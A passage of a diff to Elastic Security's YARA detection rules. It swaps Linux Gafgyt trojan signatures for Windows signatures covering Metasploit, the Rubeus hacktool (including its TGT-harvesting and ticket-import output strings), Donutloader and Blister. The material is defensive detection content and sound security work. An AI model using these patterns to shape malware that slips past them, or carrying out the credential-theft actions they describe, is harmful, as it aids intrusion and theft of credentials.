31 D2 51 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_F51C5Ac3 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_2092C42A : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" author = "Elastic Security" - id = "f51c5ac3-ade9-4d01-b578-3473a2b116db" - date = "2021-01-12" - modified = "2021-09-16" + id = "2092c42a-793b-4b0e-868b-9a39c926f44c" + date = "2023-05-09" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L594-L612" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "899c072730590003b98278bdda21c15ecaa2f49ad51e417ed59e88caf054a72d" - logic_hash = "e82b5ddb760d5bdcd146e1de12ec34c4764e668543420765146e22dee6f5732b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L290-L309" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e47d88c11a89dcc84257841de0c9f1ec388698006f55a0e15567354b33f07d3c" + logic_hash = "83c46c6b957f10d406ea9985c518eb2fba3e82b9023bfdefa8bdd4be7fb67826" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "34f254afdf94b1eb29bae4eb8e3864ea49e918a5dbe6e4c9d06a4292c104a792" + fingerprint = "4f17bfb02d3ac97e48449b6e30c9b07f604c13d5e12a99af322853c5d656ee88" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 74 2A 8B 45 0C 0F B6 00 84 C0 74 17 8B 45 0C 40 89 44 24 04 8B } + $a1 = { 65 6E 61 62 6C 65 5F 6B 65 79 62 6F 61 72 64 5F 69 6E 70 75 74 } + $a2 = { 01 04 10 49 83 C2 02 4D 85 C9 75 9C 41 8B 43 04 4C 03 D8 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_71E487Ea : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_46E1C247 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" author = "Elastic Security" - id = "71e487ea-a592-469c-a03e-0c64d2549e74" - date = "2021-01-12" - modified = "2021-09-16" + id = "46e1c247-1ebb-434f-835f-faf421b35169" + date = "2023-05-10" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L614-L632" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b8d044f2de21d20c7e4b43a2baf5d8cdb97fba95c3b99816848c0f214515295b" - logic_hash = "3de9e0e3334e9e6e5906886f95ff8ce3596f85772dc25021fb0ee148281cf81c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L311-L330" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ef70e1faa3b1f40d92b0a161c96e13c96c43ec6651e7c87ee3977ed07b950bab" + logic_hash = "760a4e28e312a7d744208dc833ffad8d139ce7c536b407625a7fb0dff5ddb1d1" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "8df69968ddfec5821500949015192b6cdbc188c74f785a272effd7bc9707f661" + fingerprint = "6cd37d32976add38d7165f8088f38f4854b59302d6adf20db5c46cd3e8c7d9e7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E0 8B 45 D8 8B 04 D0 8D 50 01 83 EC 0C 8D 85 40 FF FF FF 50 } + $a1 = { 73 74 64 61 70 69 5F 66 73 5F 66 69 6C 65 } + $a2 = { 85 D2 74 0E 8B F3 2B 75 F8 8A 01 88 04 0E 41 4A 75 F7 0F B7 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_6620Ec67 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_B62Aac1E : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" author = "Elastic Security" - id = "6620ec67-8f12-435b-963c-b44a02f43ef1" - date = "2021-01-12" - modified = "2021-09-16" + id = "b62aac1e-2ce8-4803-90ee-138b509e814d" + date = "2023-05-10" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L634-L652" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b91eb196605c155c98f824abf8afe122f113d1fed254074117652f93d0c9d6b2" - logic_hash = "2df2c8cdc2cb545f916159d44a800708b55a2993cd54a4dcf920a6a8dc6361e7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L332-L351" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "af9af81f7e46217330b447900f80c9ce38171655becb3b63e51f913b95c71e70" + logic_hash = "3ef6b7fb258b060ae00b060dbf9b07620f8cda0d9a827985bbb3ed9617969ef6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9d68db5b3779bb5abe078f9e36dd9a09d4d3ad9274a3a50bdfa0e444a7e46623" + fingerprint = "58340ea67e2544d22adba3317350150c61c84fba1d16c7c9f8d0c626c3421296" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { AF 93 64 1A D8 0B 48 93 64 0B 48 A3 64 11 D1 0B 41 05 E4 48 } + $a1 = { 42 3C 8B AC 10 88 00 00 00 44 8B 54 15 20 44 8B 5C 15 24 4C } + $a2 = { CB 4D 85 D2 74 10 41 8A 00 4D 03 C3 88 02 49 03 D3 4D 2B D3 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_D996D335 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_47F5D54A : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" author = "Elastic Security" - id = "d996d335-e049-4052-bf36-6cd07c911a8b" - date = "2021-01-12" - modified = "2021-09-16" + id = "47f5d54a-2578-4bbd-b157-8b225f6d34b3" + date = "2023-11-13" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L654-L672" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda" - logic_hash = "212c75ab61eac8b3ed2049966628dfc81ae5a620b4a4b38aaa0696d594910dea" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L353-L372" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bc3754cf4a04491a7ad7a75f69dd3bb2ddf0d8592ce078b740d7c9c7bc85a7e1" + logic_hash = "be080d0aae457348c4a02c204507a8cb14d1728d1bc50d7cf12b577aa06daf9f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac" + fingerprint = "b6dbc1b273bc9a328d5c437d11db23e8f1d3bf764bb624aa4f552c14b3dc5260" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0 } + $a32 = { 89 45 F8 FF 15 [11] 8B D8 85 DB 74 76 6A 00 6A 04 6A 00 FF 35 [4] 6A 00 6A 00 FF 15 } + $a64 = { 48 89 7C 24 48 FF 15 [4] 33 D2 44 8B C0 B9 40 00 10 00 FF 15 [4] 48 8B F8 48 85 C0 74 55 48 8B 15 [10] 4C 8B C0 48 8B CB 48 C7 44 24 20 } condition: - all of them + any of them } -rule ELASTIC_Linux_Trojan_Gafgyt_D0C57A2E : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Rubeus_43F18623 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Hacktool Rubeus (Windows.Hacktool.Rubeus)" author = "Elastic Security" - id = "d0c57a2e-c10c-436c-be13-50a269326cf2" - date = "2021-01-12" - modified = "2021-09-16" + id = "43f18623-6024-4608-8019-e3fecd54cf84" + date = "2022-10-20" + modified = "2022-11-24" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L674-L691" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "2ac51f0943d573fdc9a39837aeefd9158c27a4b3f35fbbb0a058a88392a53c14" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Rubeus.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b7b4691ad1cdad7663c32d07e911a03d9cc8b104f724c2825fd4957007649235" + logic_hash = "8714f30e12c0dc61c83491a71dbf9f1e9b6bc66663a8f2c069e7a7841d52cf68" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6" + fingerprint = "fbc2f67f394a4d21cac532b42c6749002cb7284b4a3912e18672881e6e74765d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 07 0F B6 57 01 C1 E0 08 09 D0 89 06 0F BE 47 02 C1 E8 1F 89 } + $guid = "658C8B7F-3664-4A95-9572-A3E5871DFC06" ascii wide nocase + $print_str0 = "[*] Printing argument list for use with Rubeus" ascii wide + $print_str1 = "[+] Ticket successfully imported!" ascii wide + $print_str2 = "[+] Tickets successfully purged!" ascii wide + $print_str3 = "[*] Searching for accounts that support AES128_CTS_HMAC_SHA1_96/AES256_CTS_HMAC_SHA1_96" ascii wide + $print_str4 = "[*] Action: TGT Harvesting (with auto-renewal)" ascii wide + $print_str5 = "[X] Unable to retrieve TGT using tgtdeleg" ascii wide + $print_str6 = "[!] Unhandled Rubeus exception:" ascii wide + $print_str7 = "[*] Using a TGT /ticket to request service tickets" ascii wide condition: - all of them + $guid or 4 of ($print_str*) } -rule ELASTIC_Linux_Trojan_Gafgyt_751Acb94 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Donutloader_F40E3759 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Donutloader (Windows.Trojan.Donutloader)" author = "Elastic Security" - id = "751acb94-cb23-4949-a4dd-87985c47379e" - date = "2021-01-12" - modified = "2021-09-16" + id = "f40e3759-2531-4e21-946a-fb55104814c0" + date = "2021-09-15" + modified = "2022-01-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L693-L710" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "1963351d209168f4ae2268d245cfd5320e4442d00746d021088ffae98e5da454" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Donutloader.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "541a4ca1da41f7cf54dff3fee917b219fadb60fd93a89b93b5efa3c1a57af81d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dbdfdb455868332e9fbadd36c084d0927a3dd8ab844f0b1866e914914084cd4b" + fingerprint = "a6b9ccd69d871de081759feca580b034e3c5cec788dd5b3d3db033a5499735b5" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 20 54 6F 20 43 6F 6E 6E 65 63 74 21 20 00 53 75 63 63 65 73 66 } + $x64 = { 06 B8 03 40 00 80 C3 4C 8B 49 10 49 8B 81 30 08 00 00 } + $x86 = { 04 75 EE 89 31 F0 FF 46 04 33 C0 EB 08 83 21 00 B8 02 } condition: - all of them + any of them } -rule ELASTIC_Linux_Trojan_Gafgyt_656Bf077 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Donutloader_5C38878D : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Donutloader (Windows.Trojan.Donutloader)" author = "Elastic Security" - id = "656bf077-ca0c-4d28-9daa-eb6baafaf467" - date = "2021-01-12" - modified = "2021-09-16" + id = "5c38878d-ca94-4fd9-a36e-1ae5fe713ca2" + date = "2021-09-15" + modified = "2021-01-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L712-L730" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6" - logic_hash = "0c9728304e720eb2cd00afad8d16f309514473dece48fa94af6a72ca41705a36" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Donutloader.yar#L21-L38" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "897880d13318027ac5008fe8d008f09780d6fa807d6cc828b57975443358750c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1" + fingerprint = "3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 74 28 48 8B 45 E8 0F B6 00 84 C0 74 14 48 8B 75 E8 48 FF C6 48 8B } + $a = { 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1 } condition: - all of them + any of them } -rule ELASTIC_Linux_Trojan_Gafgyt_E6D75E6F : FILE MEMORY +rule ELASTIC_Windows_Trojan_Donutloader_21E801E0 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Donutloader (Windows.Trojan.Donutloader)" author = "Elastic Security" - id = "e6d75e6f-aa04-4767-8730-6909958044a7" - date = "2021-01-12" - modified = "2021-09-16" + id = "21e801e0-b016-48b2-81f5-930e7d3dd318" + date = "2024-01-21" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L732-L750" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "48b15093f33c18778724c48c34199a420be4beb0d794e36034097806e1521eb8" - logic_hash = "339dd33a3313a4a94d2515cd4c2100ac6b9d5e0029881494c28dc3e7c8a05798" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Donutloader.yar#L40-L58" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c3bda62725bb1047d203575bbe033f0f95d4dd6402c05f9d0c69d24bd3224ca6" + logic_hash = "19ef7bc8c7117024ca72956376954254c36eeb673f9379aa00475f763084a169" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e99805e8917d6526031270b6da5c2f3cc1c8235fed1d47134835a107d0df497c" + fingerprint = "8b971734d471f281e7c48177096359e8f43578a12e42f6203f55d5e79d9ed09d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 00 00 CD 80 C3 8B 54 24 04 8B 4C 24 08 87 D3 B8 5B 00 00 00 } + $a = { 48 89 45 F0 48 8B 45 F0 48 81 C4 D0 00 00 00 5D C3 55 48 81 EC 60 02 00 00 48 8D AC 24 80 00 00 00 48 89 8D F0 01 00 00 48 89 95 F8 01 00 00 4C 89 85 00 02 00 00 4C 89 8D 08 02 00 00 48 C7 85 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_7167D08F : FILE MEMORY +rule ELASTIC_Windows_Trojan_Blister_Cb99A1Df : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Blister (Windows.Trojan.Blister)" author = "Elastic Security" - id = "7167d08f-bfeb-4d78-9783-3a1df2ef0ed3" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L752-L770" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68" - logic_hash = "88c07bf06801192f38ef66229a0aa5c1ef6242caeb080ce1c7cd13ad0d540c82" + id = "cb99a1df-756b-46fe-b657-63b4be2c0664" + date = "2021-12-21" + modified = "2022-01-13" + reference = "https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Blister.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0a7778cf6f9a1bd894e89f282f2e40f9d6c9cd4b72be97328e681fe32a1b1a00" + logic_hash = "deb1be5300d8af12dda868dd5f4ccdbb3ec653bd97c33a09e567c13ecafb9e8a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9" + fingerprint = "7a7e189ed42019636ffccc06d61e18f2aa17bc3d43d08d50bb77c3258bc1a9a4" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 0C 8A 00 3C 2D 75 13 FF 45 0C C7 45 E4 01 00 00 00 EB 07 FF } + $a1 = { 8D 45 DC 89 5D EC 50 6A 04 8D 45 F0 50 8D 45 EC 50 6A FF FF D7 } + $a2 = { 75 F7 39 4D FC 0F 85 F3 00 00 00 64 A1 30 00 00 00 53 57 89 75 } + $b1 = { 78 03 C3 8B 48 20 8B 50 1C 03 CB 8B 78 24 03 D3 8B 40 18 03 FB 89 4D F8 89 55 E0 89 45 E4 85 C0 74 3E 8B 09 8B D6 03 CB 8A 01 84 C0 74 17 C1 C2 09 0F BE C0 03 D0 41 8A 01 84 C0 75 F1 81 FA B2 17 EB 41 74 27 8B 4D F8 83 C7 02 8B 45 F4 83 C1 04 40 89 4D F8 89 45 F4 0F B7 C0 3B 45 E4 72 C2 8B FE 8B 45 04 B9 } condition: - all of them + any of them } -rule ELASTIC_Linux_Trojan_Gafgyt_27De1106 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Blister_9D757838 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Blister (Windows.Trojan.Blister)" author = "Elastic Security" - id = "27de1106-497d-40a0-8fc4-929f7a927628" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L772-L790" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "899c072730590003b98278bdda21c15ecaa2f49ad51e417ed59e88caf054a72d" - logic_hash = "4e266e1ae31d7d86866b112a04ca38c0a8185c18ebb10ac6497bbaa69f51b2fd" + id = "9d757838-ebaa-4ecf-b927-ac0f4848c9cb" + date = "2022-04-26" + modified = "2022-06-09" + reference = "https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Blister.yar#L24-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "863de84a39c9f741d8103db83b076695d0d10a7384e4e3ba319c05a6018d9737" + logic_hash = "4d9ce1622d77b2ac8b20b2dfb60ac672752dabab315221a5449ebd3c73a3edca" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9a747f0fc7ccc55f24f2654344484f643103da709270a45de4c1174d8e4101cc" + fingerprint = "4ef2e22d0006b127b253d02073cde0d805d22d8696562feabc94020e287e2eb2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 0C 0F B6 00 84 C0 74 18 8B 45 0C 40 8B 55 08 42 89 44 24 04 89 } + $a1 = { 65 48 8B 04 25 60 00 00 00 44 0F B7 DB 48 8B 48 ?? 48 8B 41 ?? C7 45 48 ?? ?? ?? ?? 4C 8B 40 ?? 49 63 40 ?? } + $a2 = { B9 FF FF FF 7F 89 5D 40 8B C1 44 8D 63 ?? F0 44 01 65 40 49 2B C4 75 ?? 39 4D 40 0F 85 ?? ?? ?? ?? 65 48 8B 04 25 60 00 00 00 44 0F B7 DB } condition: - all of them + any of them } -rule ELASTIC_Linux_Trojan_Gafgyt_148B91A2 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Blister_68B53E1B : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Blister (Windows.Trojan.Blister)" author = "Elastic Security" - id = "148b91a2-ed51-4c2d-9d15-6a48d9ea3e0a" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L792-L810" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d5b2bde0749ff482dc2389971e2ac76c4b1e7b887208a538d5555f0fe6984825" - logic_hash = "1a974c0882c2d088c978a52e5b535807c86f117cf2f05c40c084e849b1849f5b" + id = "68b53e1b-dbd7-4903-ac10-8336c05f42df" + date = "2023-08-02" + modified = "2023-08-08" + reference = "https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Blister.yar#L46-L66" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5fc79a4499bafa3a881778ef51ce29ef015ee58a587e3614702e69da304395db" + logic_hash = "6d935461406a6b9b39867d52aa5ecb088945ae0f8c56895a67e8565e5a2a3699" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0f75090ed840f4601df4e43a2f49f2b32585213f3d86d19fb255d79c21086ba3" + fingerprint = "b46d59117eda3d6a7a6397287c962106719bf338d19814e20bde9deeebfe65c1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C6 45 DB FC EB 04 C6 45 DB FE 0F B6 45 DB 88 45 FF 48 8D 75 FF 8B } + $b_loader_xor = { 48 8B C3 49 03 DC 83 E0 03 8A 44 05 48 [2-3] ?? 03 ?? 4D 2B ?? 75 } + $b_loader_virtual_protect = { 48 8D 45 50 41 ?? ?? ?? ?? 00 4C 8D ?? 04 4C 89 ?? ?? 41 B9 04 00 00 00 4C 89 ?? F0 4C 8D 45 58 48 89 44 24 20 48 8D 55 F0 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_20F5E74F : FILE MEMORY +rule ELASTIC_Windows_Trojan_Blister_487B0966 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Blister (Windows.Trojan.Blister)" author = "Elastic Security" - id = "20f5e74f-9f94-431b-877c-9b0d78a1d4eb" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L812-L830" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9084b00f9bb71524987dc000fb2bc6f38e722e2be2832589ca4bb1671e852f5b" - logic_hash = "067f1c15961c1ddceecb490b338db9f5b8501d89b38e870edfa628d21527dc1c" + id = "487b0966-fb24-4c41-84cc-f3a389461ddc" + date = "2023-09-11" + modified = "2023-09-20" + reference = "https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Blister.yar#L68-L89" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5fc79a4499bafa3a881778ef51ce29ef015ee58a587e3614702e69da304395db" + logic_hash = "521409d03335205507cc6894e0de3ca627eb966a95a2f8e7b931e552ad78bbb7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "070fe0d678612b4ec8447a07ead0990a0abd908ce714388720e7fd7055bf1175" + fingerprint = "7111f2f9746e056f6ac5e08d904f71628a548b4ab2c1181dec0a38f0f8387878" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { D8 8B 45 D0 8B 04 D0 8D 50 01 83 EC 0C 8D 85 38 FF FF FF 50 8D 85 40 FF } + $b_loader0 = { 65 48 8B 04 25 60 00 00 00 44 8B D3 41 BE ?? ?? ?? ?? 48 8B 50 18 48 83 C2 ?? 48 8B 0A } + $b_loader1 = { 0F B7 C0 4D 8D 49 02 41 33 C0 44 69 C0 ?? ?? ?? ?? 41 8B C0 C1 E8 0F 44 33 C0 41 0F B7 01 66 85 C0 } + $b_loader2 = { 66 45 03 DC 49 83 C2 04 41 0F B7 C3 49 83 C0 02 3B C6 } condition: - all of them + 2 of them } -rule ELASTIC_Linux_Trojan_Gafgyt_1B2E2A3A : FILE MEMORY +rule ELASTIC_Linux_Packer_Patched_UPX_62E11C64 : FILE { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Packer Patched_Upx (Linux.Packer.Patched_UPX)" author = "Elastic Security" - id = "1b2e2a3a-1302-41c7-be99-43edb5563294" - date = 